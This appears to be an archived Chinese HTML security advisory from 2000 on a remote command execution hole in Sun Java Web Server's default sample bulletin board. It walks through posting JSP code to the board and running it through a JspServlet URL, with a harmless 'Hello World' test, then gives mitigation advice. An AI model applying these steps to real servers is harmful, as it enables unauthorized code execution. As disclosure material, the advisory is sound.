0004.htm

关于java的开发文档

<html>

<head>
<title>新时代软件教程:操作系统 主页制作 服务器 设计软件 网络技术 编程语言 文字编辑</title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<style>
<!--
body, table {font-size: 9pt; font-family: 宋体}
a {text-decoration:none}
a:hover {color: red;text-decoration:underline}
.1  {background-color: rgb(245,245,245)}
-->
</style>
</head>
<p align="center"><script src="../../1.js"></script></a>
    <p align="center"><big><strong>Sun Java Web服务器远程可执行命令漏洞</strong></big></p>

<div align="right">---（文/飞天蜘蛛）</div>

漏洞发布时间：2000-7-13 17:41:00<br>
漏 洞 描 述:<br>
<br>
在Solaris and Windows NT的Sun Java Web Server默认安装设置下。通过公告版的样板程序的漏洞，可以远程执行任意命令。<br>
<br>
漏洞测试方法如下：<br>
<br>
下面的例子将显示如何上载和执行该代码，而在服务器上显示&quot;Hello World&quot;。<br>
<br>
输入下面的JSP代码将打印出&quot;Hello World&quot;:<br>
<br>
&lt;% String s=&quot;Hello World&quot;; %&gt;<br>
&lt;%=s %&gt;<br>
<br>
通过下面的公告版连接Post这段代码:<br>
<br>
http://jws.site/examples/applications/bboard/bboard_frames.html<br>
<br>
检验是否该代码真正的上载了:<br>
<br>
http://jws.site/board.html<br>
<br>
通过执行下面的连接编译和执行该代码:<br>
<br>
http://jws.site/servlet/com.sun.server.http.pagecompile.jsp.runtime.JspServlet/board.html<br>
<br>
解 决 方 法:<br>
<br>
仔细按照Java Web Server手册中的&quot;How to secure a web site that uses the Java Web Server&quot; 一章进行设置，或者参考下面连接:<br>
http://www.sun.com/software/jwebserver/faq/jwsca-2000-02.html<br>
或者简单的移除默认安装的这些样板文件。 <br>

  </table>
<p align="center"><script src="../../2.js"></script></a>
</body>
</html>